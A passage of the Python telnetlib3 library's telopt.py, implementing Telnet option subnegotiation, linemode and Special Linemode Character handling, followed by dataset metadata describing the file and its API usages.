pair = decoded[start + 1:end].split('\\x01', 1)\n if 2 == len(pair):\n key, value = pair\n env[key] = value\n self.log.debug('sb_env %s: %r', _name_command(opt), env)\n self._ext_callback[kind](env)\n return\n\n def _handle_sb_env_send(self, buf):\n raise NotImplementedError # recv by client\n\n def _handle_sb_sndloc(self, buf):\n location_str = b''.join(buf).decode('ascii')\n self._ext_callback[SNDLOC](location_str)\n\n def _handle_sb_naws(self, buf):\n assert buf.popleft() == NAWS\n columns = str((256 * ord(buf[0])) + ord(buf[1]))\n rows = str((256 * ord(buf[2])) + ord(buf[3]))\n self.log.debug('sb_naws: %s, %s', int(columns), int(rows))\n self._ext_callback[NAWS](int(columns), int(rows))\n\n def _handle_sb_lflow(self, buf):\n \"\"\" Handle receipt of (IAC, SB, LFLOW).\n \"\"\" # XXX\n assert buf.popleft() == LFLOW\n assert self.local_option.enabled(LFLOW), (\n 'received IAC SB LFLOW wihout IAC DO LFLOW')\n self.log.debug('sb_lflow: %r', buf)\n\n\n def _handle_sb_linemode(self, buf):\n assert buf.popleft() == LINEMODE\n cmd = buf.popleft()\n if cmd == LMODE_MODE:\n self._handle_sb_linemode_mode(buf)\n elif cmd == LMODE_SLC:\n self._handle_sb_linemode_slc(buf)\n elif cmd in (DO, DONT, WILL, WONT):\n opt = buf.popleft()\n self.log.debug('recv SB LINEMODE %s FORWARDMASK%s.',\n _name_command(cmd), '(...)' if len(buf) else '')\n assert opt == LMODE_FORWARDMASK, (\n 'Illegal byte follows IAC SB LINEMODE %s: %r, '\n ' expected LMODE_FORWARDMASK.' (_name_command(cmd), opt))\n self._handle_sb_forwardmask(cmd, buf)\n else:\n raise ValueError('Illegal IAC SB LINEMODE command, %r' % (\n _name_command(cmd),))\n\n def _handle_sb_linemode_mode(self, buf):\n assert len(buf) == 1\n self._linemode = Linemode(buf[0])\n self.log.debug('Linemode MODE is %s.' % (self.linemode,))\n\n def _handle_sb_linemode_slc(self, buf):\n \"\"\" Process and reply to linemode slc command function triplets. \"\"\"\n assert 0 == len(buf) % 3, ('SLC buffer must be byte triplets')\n self._slc_start()\n while len(buf):\n func = buf.popleft()\n flag = buf.popleft()\n value = buf.popleft()\n self._slc_process(func, SLC_definition(flag, value))\n self._slc_end()\n self.request_forwardmask()\n\n def _handle_sb_forwardmask(self, cmd, buf):\n # set and report about pending options by 2-byte opt,\n if self.is_server:\n assert self.remote_option.enabled(LINEMODE), (\n 'cannot recv LMODE_FORWARDMASK %s (%r) '\n 'without first sending DO LINEMODE.' % (cmd, buf,))\n assert cmd not in (DO, DONT), (\n 'cannot recv %s LMODE_FORWARDMASK on server end',\n _name_command(cmd,))\n if self.is_client:\n assert self.local_option.enabled(LINEMODE), (\n 'cannot recv %s LMODE_FORWARDMASK without first '\n ' sending WILL LINEMODE.')\n assert cmd not in (WILL, WONT), (\n 'cannot recv %s LMODE_FORWARDMASK on client end',\n _name_command(cmd,))\n assert cmd not in (DONT) or len(buf) == 0, (\n 'Illegal bytes follow DONT LMODE_FORWARDMASK: %r' % (\n buf,))\n assert cmd not in (DO) and len(buf), (\n 'bytes must follow DO LMODE_FORWARDMASK')\n if cmd in (WILL, WONT):\n self._forwardmask_enabled = cmd is WILL\n elif cmd in (DO, DONT):\n self._forwardmask_enabled = cmd is DO\n if cmd == DO:\n self._handle_do_forwardmask(buf)\n\n def _handle_do_forwardmask(self, buf):\n \"\"\" Handles buffer received in SB LINEMODE DO FORWARDMASK \n \"\"\" # XXX UNIMPLEMENTED: ( received on client )\n pass\n\n def _send_status(self):\n \"\"\" Respond after DO STATUS received by client (rfc859). \"\"\"\n assert (self.pending_option.enabled(WILL + STATUS)\n or self.local_option.enabled(STATUS)), (u'Only the sender '\n 'of IAC WILL STATUS may send IAC SB STATUS IS.')\n response = collections.deque()\n response.extend([IAC, SB, STATUS, IS])\n for opt, status in self.local_option.items():\n # status is 'WILL' for local option states that are True,\n # and 'WONT' for options that are False.\n response.extend([WILL if status else WONT, opt])\n for opt, status in self.remote_option.items():\n # status is 'DO' for remote option states that are True,\n # or for any DO option requests pending reply. status is\n # 'DONT' for any remote option states that are False,\n # or for any DONT option requests pending reply.\n if status or DO + opt in self.pending_option:\n response.extend([DO, opt])\n elif not status or DONT + opt in self.pending_option:\n response.extend([DONT, opt])\n response.extend([IAC, SE])\n self.log.debug('send: %s', ', '.join([\n _name_command(byte) for byte in response]))\n self.send_iac(bytes([ord(byte) for byte in response]))\n if self.pending_option.enabled(WILL + STATUS):\n self.pending_option[WILL + STATUS] = False\n\n# private Special Linemode Character (SLC) routines\n#\n\n def _default_slc(self, tabset):\n \"\"\" Set property ``_slctab`` to default SLC tabset, unless it\n is unlisted (as is the case for SLC_MCL+), then set as\n SLC_NOSUPPORT _POSIX_VDISABLE (0xff).\n\n ``_slctab`` is a dictionary of SLC functions, such as SLC_IP,\n to a tuple of the handling character and support level.\n \"\"\"\n self._slctab = {}\n self._default_tabset = tabset\n for slc in range(NSLC + 1):\n self._slctab[bytes([slc])] = tabset.get(bytes([slc]),\n SLC_definition(SLC_NOSUPPORT, _POSIX_VDISABLE))\n\n def _slc_snoop(self, byte):\n \"\"\" Scan ``self._slctab`` for matching byte values.\n\n If any are discovered, the (callback, func_byte, slc_definition)\n is returned. Otherwise (None, None, None) is returned.\n \"\"\"\n # scan byte for SLC function mappings, if any, return function\n for slc_func, slc_def in self._slctab.items():\n if byte == slc_def.val and slc_def.val != theNULL:\n callback = self._slc_callback.get(slc_func, None)\n return (callback, slc_func, slc_def)\n return (None, None, None)\n\n\n def _slc_end(self):\n \"\"\" Send any SLC pending SLC changes sotred in _slc_buffer \"\"\"\n if 0 == len(self._slc_buffer):\n self.log.debug('slc_end: IAC SE')\n else:\n self.write(b''.join(self._slc_buffer), oob=True)\n self.log.debug('slc_end: (%r) IAC SE', b''.join(self._slc_buffer))\n self.send_iac(IAC + SE)\n self._slc_buffer.clear()\n\n def _slc_start(self):\n \"\"\" Send IAC SB LINEMODE SLC header \"\"\"\n self.send_iac(IAC + SB + LINEMODE + LMODE_SLC)\n self.log.debug('slc_start: IAC + SB + LINEMODE + SLC')\n\n def _slc_send(self):\n \"\"\" Send all special characters that are supported \"\"\"\n send_count = 0\n for func in range(NSLC + 1):\n if self._slctab[bytes([func])].nosupport:\n continue\n if func is 0 and not self.is_server:\n # only the server may send an octet with the first\n # byte (func) set as 0 (SLC_NOSUPPORT).\n continue\n self._slc_add(bytes([func]))\n send_count += 1\n self.log.debug('slc_send: %d', send_count)\n\n def _slc_add(self, func, slc_def=None):\n \"\"\" buffer slc triplet response as (function, flag, value),\n for the given SLC_func byte and slc_def instance providing\n byte attributes ``flag`` and ``val``. If no slc_def is provided,\n the slc definition of ``_slctab`` is used by key ``func``.\n \"\"\"\n assert len(self._slc_buffer) < self.SLC_MAXSIZE, ('SLC: buffer full')\n if slc_def is None:\n slc_def = self._slctab[func]\n self.log.debug('_slc_add (%s, %s)',\n name_slc_command(func), slc_def)\n self._slc_buffer.extend([func, slc_def.mask, slc_def.val])\n\n def _slc_process(self, func, slc_def):\n \"\"\" Process an SLC definition provided by remote end.\n\n Ensure the function definition is in-bounds and an SLC option\n we support. Store SLC_VARIABLE changes to self._slctab, keyed\n by SLC byte function ``func``.\n\n The special definition (0, SLC_DEFAULT|SLC_VARIABLE, 0) has the\n side-effect of replying with a full slc tabset, resetting to\n the default tabset, if indicated. \"\"\"\n self.log.debug('_slc_process %s mine=%s, his=%s',\n name_slc_command(func), self._slctab[func], slc_def)\n\n # out of bounds checking\n if ord(func) > NSLC:\n self.log.warn('SLC not supported (out of range): (%r)', func)\n self._slc_add(func, SLC_nosupport())\n return\n\n # process special request\n if func == theNULL:\n if slc_def.level == SLC_DEFAULT:\n # client requests we send our default tab,\n self.log.info('SLC_DEFAULT')\n self._default_slc(self._default_tabset)\n self._slc_send()\n elif slc_def.level == SLC_VARIABLE:\n # client requests we send our current tab,\n self.log.info('SLC_VARIABLE')\n self._slc_send()\n else:\n self.log.warn('func(0) flag expected, got %s.', slc_def)\n return\n\n # evaluate slc\n mylevel, myvalue = (self._slctab[func].level, self._slctab[func].val)\n if slc_def.level == mylevel and myvalue == slc_def.val:\n return\n elif slc_def.level == mylevel and slc_def.ack:\n return\n elif slc_def.ack:\n self.log.debug('slc value mismatch with ack bit set: (%r,%r)',\n myvalue, slc_def.val)\n return\n else:\n self._slc_change(func, slc_def)\n\n def _slc_change(self, func, slc_def):\n \"\"\" Update SLC tabset with SLC definition provided by remote end.\n\n Modify prviate attribute ``_slctab`` appropriately for the level\n and value indicated, except for slc tab functions of SLC_NOSUPPORT.\n\n Reply as appropriate ..\n \"\"\"\n hislevel, hisvalue = slc_def.level, slc_def.val\n mylevel, myvalue = self._slctab[func].level, self._slctab[func].val\n if hislevel == SLC_NOSUPPORT:\n # client end reports SLC_NOSUPPORT; use a\n # nosupport definition with ack bit set\n self._slctab[func] = SLC_nosupport()\n self._slctab[func].set_flag(SLC_ACK)\n self._slc_add(func)\n return\n\n if hislevel == SLC_DEFAULT:\n # client end requests we use our default level\n if mylevel == SLC_DEFAULT:\n # client end telling us to use SLC_DEFAULT on an SLC we do not\n # support (such as SYNCH). Set flag to SLC_NOSUPPORT instead\n # of the SLC_DEFAULT value that it begins with\n self._slctab[func].set_mask(SLC_NOSUPPORT)\n else:\n # set current flag to the flag indicated in default tab\n self._slctab[func].set_mask(DEFAULT_SLC_TAB.get(func).mask)\n # set current value to value indicated in default tab\n self._slctab[func].set_value(DEFAULT_SLC_TAB.get(func,\n SLC_nosupport()).val)\n self._slc_add(func)\n return\n\n # client wants to change to a new value, or,\n # refuses to change to our value, accept their value.\n if self._slctab[func].val != theNULL:\n self._slctab[func].set_value(slc_def.val)\n self._slctab[func].set_mask(slc_def.mask)\n slc_def.set_flag(SLC_ACK)\n self._slc_add(func, slc_def)\n return\n\n # if our byte value is b'\\x00', it is not possible for us to support\n # this request. If our level is default, just ack whatever was sent.\n # it is a value we cannot change.\n if mylevel == SLC_DEFAULT:\n # If our level is default, store & ack whatever was sent\n self._slctab[func].set_mask(slc_def.mask)\n self._slctab[func].set_value(slc_def.val)\n slc_def.set_flag(SLC_ACK)\n self._slc_add(func, slc_def)\n elif slc_def.level == SLC_CANTCHANGE and mylevel == SLC_CANTCHANGE:\n # \"degenerate to SLC_NOSUPPORT\"\n self._slctab[func].set_mask(SLC_NOSUPPORT)\n self._slc_add(func)\n else:\n # mask current level to levelbits (clears ack),\n self._slctab[func].set_mask(self._slctab[func].level)\n if mylevel == SLC_CANTCHANGE:\n self._slctab[func].val = DEFAULT_SLC_TAB.get(\n func, SLC_nosupport()).val\n self._slc_add(func)\n\n def _generate_forwardmask(self):\n \"\"\" Generate a 32-byte or 16-byte Forwardmask() instance\n\n Forwardmask is formed by a bitmask of all 256 possible 8-bit\n keyboard ascii input, or, when not 'outbinary', a 16-byte\n 7-bit representation of each value, and whether or not they\n should be \"forwarded\" by the client on the transport stream\n \"\"\"\n # (as opposed to caught locally, such as ^C).\n #\n # Characters requested to be forwarded are any bytes matching a\n # supported SLC function byte in self._slctab.\n #\n # The return value is an instance of ``Forwardmask``, which can\n # be tested by using the __contains__ method::\n #\n # if b'\\x03' in stream.linemode_forwardmask:\n # stream.write(b'Press ^C to exit.\\r\\n')\n if not self.local_option.enabled(BINARY):\n num_bytes, msb = 16, 127\n else:\n num_bytes, msb = 32, 256\n mask32 = [theNULL] * num_bytes\n for mask in range(msb // 8):\n start = mask * 8\n last = start + 7\n byte = theNULL\n for char in range(start, last + 1):\n (func, slc_name, slc_def) = self._slc_snoop(bytes([char]))\n if func is not None and not slc_def.nosupport:\n # set bit for this character, it is a supported slc char\n byte = bytes([ord(byte) | 1])\n if char != last:\n # shift byte left for next character,\n # except for the final byte.\n byte = bytes([ord(byte) << 1])\n mask32[mask] = byte\n return Forwardmask(b''.join(mask32), ack=self._forwardmask_enabled)\n\n# Class constructor / set-default routines\n#\n def _init_options(self):\n \"\"\" Initilize dictionaries ``pending_option``, ``local_option``,\n ``remote_option``, and call ``set_default_linemode()``.\n \"\"\"\n #: a dictionary of telnet option ``opt`` bytes that follow an\n # *IAC DO* or *DONT* command, and contains a value of ``True``\n # until an *IAC WILL* or *WONT* has been received by remote end.\n # Requests related to extended RFC sub-negotation are keyed by\n # *SB* ``opt``.\n self.pending_option = Option('pending_option', self.log)\n\n #: a dictionary of telnet option ``byte`` bytes that follow an\n # *IAC WILL* or *WONT* command sent by local end to indicate local\n # capability. For example, if ``local_option[ECHO]`` is ``True``,\n # then this end should echo input received from remote end (note\n # this is clearly not a valid mode for client mode)\n self.local_option = Option('local_option', self.log)\n\n #: a dictionary of telnet option ``byte`` bytes that follow an\n # *IAC WILL* or *WONT* command received by remote end to indicate\n # remote capability. For example, if remote_option[NAWS] (Negotiate\n # about window size) is True, then the window dimensions of the\n # remote client may be determined by ``request_naws()``\n self.remote_option = Option('remote_option', self.log)\n\n self.set_default_linemode()\n\n def _default_callbacks(self):\n \"\"\" Set default callback dictionaries ``_iac_callback``,\n ``_slc_callback``, and ``_ext_callback`` to default methods of\n matching names, such that IAC + IP, or, the SLC value negotiated\n for SLC_IP, signals a callback to method ``self.handle_ip``.\n \"\"\"\n self._iac_callback = {}\n for iac_cmd, key in DEFAULT_IAC_CALLBACKS:\n self.set_iac_callback(iac_cmd, getattr(self, 'handle_%s' % (key,)))\n\n self._slc_callback = {}\n for slc_cmd, key in DEFAULT_SLC_CALLBACKS:\n self.set_slc_callback(slc_cmd, getattr(self, 'handle_%s' % (key,)))\n\n # extended callbacks may receive various arguments\n self._ext_callback = {}\n for ext_cmd, key in DEFAULT_EXT_CALLBACKS:\n self.set_ext_callback(ext_cmd, getattr(self, 'handle_%s' % (key,)))\n\nclass Linemode(object):\n def __init__(self, mask=LMODE_MODE_LOCAL):\n \"\"\" A mask of ``LMODE_MODE_LOCAL`` means that all line editing is\n performed on the client side (default). A mask of theNULL (\\x00)\n indicates that editing is performed on the remote side. Valid\n flags are ``LMODE_MODE_TRAPSIG``, ``LMODE_MODE_ACK``,\n ``LMODE_MODE_SOFT_TAB``, ``LMODE_MODE_LIT_ECHO``.\n \"\"\"\n assert type(mask) is bytes and len(mask) == 1\n self.mask = mask\n\n def set_flag(self, flag):\n \"\"\" Set linemode bitmask ``flag``. \"\"\"\n self.mask = bytes([ord(self.mask) | ord(flag)])\n\n def unset_flag(self, flag):\n \"\"\" Unset linemode bitmask ``flag``. \"\"\"\n self.mask = bytes([ord(self.mask) ^ ord(flag)])\n\n @property\n def remote(self):\n \"\"\" True if linemode processing is done on server end\n (remote processing).\n\n \"\"\"\n return not self.local\n\n @property\n def local(self):\n \"\"\" True if telnet stream is in EDIT mode (local processing).\n\n When set, the client side of the connection should process all\n input lines, performing any editing functions, and only send\n completed lines to the remote side.\n\n When unset, client side should *not* process any input from the\n user, and the server side should take care of all character\n processing that needs to be done.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_LOCAL))\n\n @property\n def trapsig(self):\n \"\"\" True if signals are trapped by client.\n\n When set, the client side should translate appropriate\n interrupts/signals to their Telnet equivalent. (These would be\n IP, BRK, AYT, ABORT, EOF, and SUSP)\n\n When unset, the client should pass interrupts/signals as their\n normal ASCII values, if desired, or, trapped locally.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_TRAPSIG))\n\n @property\n def ack(self):\n \"\"\" Returns True if ack bit is set.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_ACK))\n\n @property\n def soft_tab(self):\n \"\"\" When set, the client will expand horizontal tab (\\\\x09)\n into the appropriate number of spaces.\n\n When unset, the client should allow horitzontal tab to\n pass through un-modified. This status is only relevant\n for the client end.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_SOFT_TAB))\n\n @property\n def lit_echo(self):\n \"\"\" When set, non-printable characters are displayed as a literal\n character, allowing control characters to write directly to\n the user's screen.\n\n When unset, the LIT_ECHO, the client side may echo the character\n in any manner that it desires (fe: '^C' for chr(3)).\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_LIT_ECHO))\n\n def __str__(self):\n \"\"\" Returns string representation of line mode, for debugging \"\"\"\n if self.mask == bytes([0]):\n return 'remote'\n flags = []\n # we say 'local' to indicate that 'edit' mode means that all\n # input processing is done locally, instead of the obtusely named\n # flag 'edit'\n if self.local:\n flags.append('local')\n else:\n flags.append('remote')\n if self.trapsig:\n flags.append('trapsig')\n if self.soft_tab:\n flags.append('soft_tab')\n if self.lit_echo:\n flags.append('lit_echo')\n if self.ack:\n flags.append('ack')\n return '|'.join(flags)\n\n#: List of globals that may match an iac command option bytes\n_DEBUG_OPTS = dict([(value, key)\n for key, value in globals().items() if key in\n ('LINEMODE', 'LMODE_FORWARDMASK', 'NAWS', 'NEW_ENVIRON',\n 'ENCRYPT', 'AUTHENTICATION', 'BINARY', 'SGA', 'ECHO',\n 'STATUS', 'TTYPE', 'TSPEED', 'LFLOW', 'XDISPLOC', 'IAC',\n 'DONT', 'DO', 'WONT', 'WILL', 'SE', 'NOP', 'DM', 'TM',\n 'BRK', 'IP', 'ABORT', 'AO', 'AYT', 'EC', 'EL', 'EOR',\n 'GA', 'SB', 'EOF', 'SUSP', 'ABORT', 'LOGOUT',\n 'CHARSET', 'SNDLOC')])\n\ndef _name_command(byte):\n \"\"\" Given an IAC byte, return its mnumonic global constant. \"\"\"\n return (repr(byte) if byte not in _DEBUG_OPTS\n else _DEBUG_OPTS[byte])\n\ndef _name_commands(cmds, sep=' '):\n return ' '.join([\n _name_command(bytes([byte])) for byte in cmds])\n\n", "sub_path": "telnetlib3/telopt.py", "file_name": "telopt.py", "file_ext": "py", "file_size_in_byte": 73426, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "telnetlib.BRK", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.IP", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.AO", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.AYT", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.EC", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.EL", "line_number": 36, "usage_type": "name"}, {"api_name": "telnetlib.NOP", "line_number": 37, "usage_type": "name"}, {"api_name": "telnetlib.DM", "line_number": 37, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 37, "usage_type": "name"}, {"api_name": "slc.SLC_SYNCH", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_BRK", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_IP", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_AO", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_AYT", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_EOR", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_ABORT", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_EOF", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_SUSP", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_EC", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_EL", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_EW", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_RP", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_LNEXT", "line_number": 43, "usage_type": "name"}, {"api_name": "slc.SLC_XON", "line_number": 43, "usage_type": "name"}, {"api_name": "slc.SLC_XOFF", "line_number": 43, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 47, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 56, "usage_type": "argument"}, {"api_name": "slc.NSLC", "line_number": 103, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 113, "usage_type": "argument"}, {"api_name": "telnetlib.ECHO", "line_number": 114, "usage_type": "argument"}, {"api_name": "telnetlib.SGA", "line_number": 115, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 117, "usage_type": "argument"}, {"api_name": "telnetlib.ECHO", "line_number": 118, "usage_type": "argument"}, {"api_name": "telnetlib.SGA", "line_number": 119, "usage_type": "argument"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 152, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 193, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 195, "usage_type": "call"}, {"api_name": "telnetlib.DO", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 222, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 224, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 226, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 239, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 243, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 256, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 266, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 269, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 270, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 271, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 273, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 274, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 276, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 277, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 277, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 281, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 282, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 283, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 284, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 285, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 287, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 291, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 291, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 297, "usage_type": "argument"}, {"api_name": "slc.name_slc_command", "line_number": 303, "usage_type": "call"}, {"api_name": "slc.SLC_XON", "line_number": 324, "usage_type": "name"}, {"api_name": "telnetlib.BINARY", "line_number": 342, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 356, "usage_type": "argument"}, {"api_name": "telnetlib.DM", "line_number": 368, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 372, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 373, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 375, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 377, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 382, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 382, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 388, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 388, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 393, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 393, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 401, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 404, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 406, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 426, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 427, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 427, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 440, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 442, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 442, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 443, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 443, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 447, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 447, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 458, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 460, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 460, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 461, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 461, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 475, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 479, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 479, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 480, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 480, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 483, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 483, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 506, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 512, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 516, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 517, "usage_type": "call"}, {"api_name": "telnetlib.IAC", "line_number": 518, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 518, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 522, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 523, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 523, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 534, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 536, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 536, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 537, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 537, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 549, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 551, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 551, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 552, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 552, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 564, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 565, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 572, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 585, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 591, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 591, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 591, 